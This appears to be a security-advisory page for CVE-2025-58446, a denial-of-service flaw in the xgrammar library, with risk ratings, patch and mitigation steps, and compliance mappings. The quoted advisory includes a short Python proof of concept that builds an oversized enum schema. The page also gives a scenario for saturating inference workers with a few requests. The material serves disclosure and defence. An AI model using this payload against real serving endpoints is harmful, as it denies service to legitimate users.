CVE-2025-58446 — MEDIUM AI Security Vulnerability

CISO Take

xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.

Risk Assessment

Effective risk is medium-high for exposed inference endpoints, despite the medium CVSS. The attack surface is any API that accepts caller-supplied JSON schemas for structured generation — a common pattern in agentic and enterprise LLM deployments. EPSS is very low (0.00091), suggesting no current active exploitation, but the PoC is fully public and requires zero AI/ML expertise to execute. Impact is availability, not confidentiality — a single malicious request can monopolize an inference thread for minutes, enabling throughput starvation against multi-tenant or high-availability deployments.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
xgrammar	pip	= 0.1.23	`0.1.24`
1.7K 152 dependents Pushed 7d ago 100% patched ~5d to patch Full package profile →

Do you use xgrammar? You're affected.

Severity & Risk

CVSS 3.1

N/A

EPSS

0.1%

chance of exploitation in 30 days

Higher than 26% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

5 steps

Patch

Upgrade xgrammar to v0.1.24 or later — the fix optimizes the grammar optimizer and disables slow paths for large grammars.
Short-term workaround

Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema().
Rate limiting

Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits.
Detection

Alert on grammar parsing durations exceeding 10 seconds — this is anomalous and indicative of exploitation.
Audit exposure

Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.

CISA SSVC Assessment

Decision Track*

Exploitation poc

Automatable Yes

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

DoS Inference Framework AML.T0029 - Denial of AI Service AML.T0034 - Cost Harvesting AML.T0049 - Exploit Public-Facing Application

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.6 - AI system operation and monitoring A.8.4 - AI system resources

NIST AI RMF

MANAGE-2.4 - Risks and benefits of the AI system are communicated to relevant AI actors MEASURE-2.5 - AI system to be deployed satisfies its requirements for availability

OWASP LLM Top 10

LLM04 - Model Denial of Service

Frequently Asked Questions

What is CVE-2025-58446?

xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.

Is CVE-2025-58446 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-58446, increasing the risk of exploitation.

How to fix CVE-2025-58446?

1. **Patch**: Upgrade xgrammar to v0.1.24 or later — the fix optimizes the grammar optimizer and disables slow paths for large grammars. 2. **Short-term workaround**: Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema(). 3. **Rate limiting**: Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits. 4. **Detection**: Alert on grammar parsing durations exceeding 10 seconds — this is anomalous and indicative of exploitation. 5. **Audit exposure**: Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.

What systems are affected by CVE-2025-58446?

This vulnerability affects the following AI/ML architecture patterns: model serving, structured output pipelines, LLM inference APIs, agentic tool-calling pipelines.

What is the CVSS score for CVE-2025-58446?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary Provided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser. ### Details Full reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers. ### Patch This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars. Thanks to @Seven-Streams ### PoC ``` import string import random def enum_schema(size=10000,str_len=10): enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]} schema = { "definitions": { "colorEnum": enum }, "type": "object", "properties": { "color1": { "$ref": "#/definitions/colorEnum" }, "color2": { "$ref": "#/definitions/colorEnum" }, "color3": { "$ref": "#/definitions/colorEnum" }, "color4": { "$ref": "#/definitions/colorEnum" }, "color5": { "$ref": "#/definitions/colorEnum" }, "color6": { "$ref": "#/definitions/colorEnum" }, "color7": { "$ref": "#/definitions/colorEnum" }, "color8": { "$ref": "#/definitions/colorEnum" } }, "required": [ "color1", "color2" ] } return schema schema_enum = enum_schema() print(schema_enum) print(test_schema(schema_enum, {})) ``` where: ``` def test_schema(schema, instance): grammar = xgr.Grammar.from_json_schema( json.dumps(schema), strict_mode=True ) return _is_grammar_accept_string(grammar, json.dumps(instance)) ``` ### Impact DOS

Exploitation Scenario

An adversary targeting a multi-tenant LLM API (e.g., an enterprise copilot or structured data extraction service) crafts a JSON schema with thousands of enum values totaling over 100k characters — trivially generated with the public PoC. They submit this as the response_format schema in a constrained generation request. The xgrammar optimizer enters a slow computation path, blocking the inference thread for several minutes. By issuing a small number of concurrent requests (5–10), the attacker can saturate all inference workers, causing complete service unavailability for legitimate users. The attack costs pennies in compute and requires no authentication bypass or specialized knowledge, only awareness of the library version and the public PoC.